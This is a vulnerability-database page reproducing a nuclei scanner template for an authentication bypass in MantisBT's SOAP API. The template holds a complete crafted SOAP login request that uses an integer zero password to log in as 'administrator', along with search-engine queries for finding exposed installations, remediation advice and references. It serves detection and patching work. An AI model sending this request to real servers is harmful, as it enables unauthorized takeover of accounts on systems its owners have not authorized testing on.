Lucene search
+L

MantisBT < 2.28.1 - SOAP API Authentication Bypass

🗓️ 13 Sep 2026 02:04:30Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

MantisBT < 2.28.1 SOAP API authentication bypass via type confusion on password parameter in MySQL.

Related
Refs
Code
id: CVE-2026-30849

info:
  name: MantisBT < 2.28.1 - SOAP API Authentication Bypass
  author: str4k3r
  severity: critical
  description: |
    Mantis Bug Tracker < 2.28.1 on MySQL databases contains an authentication bypass caused by improper type checking on the password parameter in the SOAP API, letting attackers login without the actual password using a crafted SOAP envelope, exploit requires knowing the victim's username.
  impact: |
    Attackers can bypass authentication to access victim accounts and execute API functions, potentially compromising user data and system integrity.
  remediation: |
    Upgrade to version 2.28.1 or later; disabling the SOAP API reduces risk.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-30849
    - https://github.com/mantisbt/mantisbt/security/advisories/GHSA-phrq-pc6r-f6gh
    - https://mantisbt.org/bugs/view.php?id=36902
  classification:
    cve-id: CVE-2026-30849
    epss-score: 0.01457
    epss-percentile: 0.7201
    cwe-id: CWE-843
    cvss-score: 9.3
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
  metadata:
    verified: true
    max-request: 1
    vendor: mantisbt
    product: mantisbt
    shodan-query: http.title:"MantisBT"
    fofa-query: title="MantisBT"
  tags: cve,cve2026,mantisbt,soap,auth-bypass,type-confusion,mysql,unauth

http:
  - raw:
      - |
        POST /api/soap/mantisconnect.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8
        SOAPAction: "http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_login"

        <?xml version="1.0" encoding="UTF-8"?>
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
          <SOAP-ENV:Body>
            <ns1:mc_login xmlns:ns1="http://futureware.biz/mantisconnect" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
              <username xsi:type="xsd:string">administrator</username>
              <password xsi:type="xsd:int">0</password>
            </ns1:mc_login>
          </SOAP-ENV:Body>
        </SOAP-ENV:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "mc_loginResponse", "access_level")'
        condition: and
# digest: 4a0a00473045022100933a667c7ac42ae6fd59e03fb339874de1e660f9aed5230516eb8d7d75d64b9d022063691e10f364a15e69ecea299df9b1864ae0ba7731ef2137e835c4380c8d842c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2026 05:21Current
CVSS 3.19.8
CVSS 49.3
EPSS0.01457
SSVC
5